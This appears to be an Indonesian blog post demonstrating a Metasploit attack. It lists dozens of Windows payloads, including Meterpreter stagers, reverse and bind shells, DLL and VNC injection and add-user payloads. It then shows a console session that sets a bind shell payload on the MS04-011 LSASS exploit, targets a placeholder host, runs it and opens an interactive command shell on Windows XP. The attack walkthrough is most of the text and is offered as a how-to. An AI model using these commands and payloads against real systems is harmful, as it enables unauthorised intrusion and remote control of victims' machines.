windows/adduser/bind_ipv6_tcp Windows Execute net user /ADD, Bind TCP Stager (IPv6)
windows/adduser/bind_nonx_tcp Windows Execute net user /ADD, Bind TCP Stager (No NX Support)
windows/adduser/bind_tcp Windows Execute net user /ADD, Bind TCP Stager
windows/adduser/reverse_http Windows Execute net user /ADD, PassiveX Reverse HTTP Tunneling Stager
windows/adduser/reverse_ipv6_tcp Windows Execute net user /ADD, Reverse TCP Stager (IPv6)
windows/adduser/reverse_nonx_tcp Windows Execute net user /ADD, Reverse TCP Stager (No NX Support)
windows/adduser/reverse_ord_tcp Windows Execute net user /ADD, Reverse Ordinal TCP Stager
windows/adduser/reverse_tcp Windows Execute net user /ADD, Reverse TCP Stager
windows/dllinject/bind_ipv6_tcp Windows Inject DLL, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp Windows Inject DLL, Bind TCP Stager (No NX Support)
windows/dllinject/bind_tcp Windows Inject DLL, Bind TCP Stager
windows/dllinject/reverse_http Windows Inject DLL, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_ipv6_tcp Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp Windows Inject DLL, Reverse TCP Stager (No NX Support)
windows/dllinject/reverse_ord_tcp Windows Inject DLL, Reverse Ordinal TCP Stager
windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager
windows/download_exec Windows Executable Download and Execute
windows/download_exec/bind_ipv6_tcp Windows Executable Download and Execute, Bind TCP Stager (IPv6)
windows/download_exec/bind_nonx_tcp Windows Executable Download and Execute, Bind TCP Stager (No NX Support)
windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager
windows/download_exec/reverse_http Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager
windows/download_exec/reverse_ipv6_tcp Windows Executable Download and Execute, Reverse TCP Stager (IPv6)
windows/download_exec/reverse_nonx_tcp Windows Executable Download and Execute, Reverse TCP Stager (No NX Support)
windows/download_exec/reverse_ord_tcp Windows Executable Download and Execute, Reverse Ordinal TCP Stager
windows/download_exec/reverse_tcp Windows Executable Download and Execute, Reverse TCP Stager
windows/exec Windows Execute Command
windows/exec/bind_ipv6_tcp Windows Execute Command, Bind TCP Stager (IPv6)
windows/exec/bind_nonx_tcp Windows Execute Command, Bind TCP Stager (No NX Support)
windows/exec/bind_tcp Windows Execute Command, Bind TCP Stager
windows/exec/reverse_http Windows Execute Command, PassiveX Reverse HTTP Tunneling Stager
windows/exec/reverse_ipv6_tcp Windows Execute Command, Reverse TCP Stager (IPv6)
windows/exec/reverse_nonx_tcp Windows Execute Command, Reverse TCP Stager (No NX Support)
windows/exec/reverse_ord_tcp Windows Execute Command, Reverse Ordinal TCP Stager
windows/exec/reverse_tcp Windows Execute Command, Reverse TCP Stager
windows/meterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp Windows Meterpreter, Bind TCP Stager (No NX Support)
windows/meterpreter/bind_tcp Windows Meterpreter, Bind TCP Stager
windows/meterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_ipv6_tcp Windows Meterpreter, Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp Windows Meterpreter, Reverse TCP Stager (No NX Support)
windows/meterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager
windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager
windows/reflectivedllinject/bind_ipv6_tcp Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/reflectivedllinject/bind_nonx_tcp Reflective Dll Injection, Bind TCP Stager (No NX Support)
windows/reflectivedllinject/bind_tcp Reflective Dll Injection, Bind TCP Stager
windows/reflectivedllinject/reverse_http Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/reflectivedllinject/reverse_ipv6_tcp Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/reflectivedllinject/reverse_nonx_tcp Reflective Dll Injection, Reverse TCP Stager (No NX Support)
windows/reflectivedllinject/reverse_ord_tcp Reflective Dll Injection, Reverse Ordinal TCP Stager
windows/reflectivedllinject/reverse_tcp Reflective Dll Injection, Reverse TCP Stager
windows/reflectivemeterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)
windows/reflectivemeterpreter/bind_nonx_tcp Windows Meterpreter, Bind TCP Stager (No NX Support)
windows/reflectivemeterpreter/bind_tcp Windows Meterpreter, Bind TCP Stager
windows/reflectivemeterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager
windows/reflectivemeterpreter/reverse_ipv6_tcp Windows Meterpreter, Reverse TCP Stager (IPv6)
windows/reflectivemeterpreter/reverse_nonx_tcp Windows Meterpreter, Reverse TCP Stager (No NX Support)
windows/reflectivemeterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager
windows/reflectivemeterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager
windows/reflectivevncinject/bind_ipv6_tcp Reflective VNC Dll Injection, Bind TCP Stager (IPv6)
windows/reflectivevncinject/bind_nonx_tcp Reflective VNC Dll Injection, Bind TCP Stager (No NX Support)
windows/reflectivevncinject/bind_tcp Reflective VNC Dll Injection, Bind TCP Stager
windows/reflectivevncinject/reverse_http Reflective VNC Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/reflectivevncinject/reverse_ipv6_tcp Reflective VNC Dll Injection, Reverse TCP Stager (IPv6)
windows/reflectivevncinject/reverse_nonx_tcp Reflective VNC Dll Injection, Reverse TCP Stager (No NX Support)
windows/reflectivevncinject/reverse_ord_tcp Reflective VNC Dll Injection, Reverse Ordinal TCP Stager
windows/reflectivevncinject/reverse_tcp Reflective VNC Dll Injection, Reverse TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX Support)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX Support)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX Support)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX Support)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/vncinject/bind_ipv6_tcp Windows VNC Inject, Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp Windows VNC Inject, Bind TCP Stager (No NX Support)
windows/vncinject/bind_tcp Windows VNC Inject, Bind TCP Stager
windows/vncinject/reverse_http Windows VNC Inject, PassiveX Reverse HTTP Tunneling Stager
windows/vncinject/reverse_ipv6_tcp Windows VNC Inject, Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp Windows VNC Inject, Reverse TCP Stager (No NX Support)
windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager
windows/vncinject/reverse_tcp Windows VNC Inject, Reverse TCP Stager
msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms04_011_lsass) > set RHOST <IPtarget>
RHOST =>
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8
00c04fd92ef5:0.0@ncacn_np: IPtarget[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8
00c04fd92ef5:0.0@ncacn_np: IPtarget [\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (IPtarget:445 -> IPtarget:80)
[*] The DCERPC service did not reply to our request
Active sessions
===============
Id Description Tunnel
-- ----------- ------
3 Command shell
Belum selesai sampai disini….
Oke …… Setelah itu
msf exploit(ms04_011_lsass) > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Tidak ada komentar:
Posting Komentar
silakan bagi yang mau bertanya, senang hati saya akan menjawab... itupun kalau saya tau,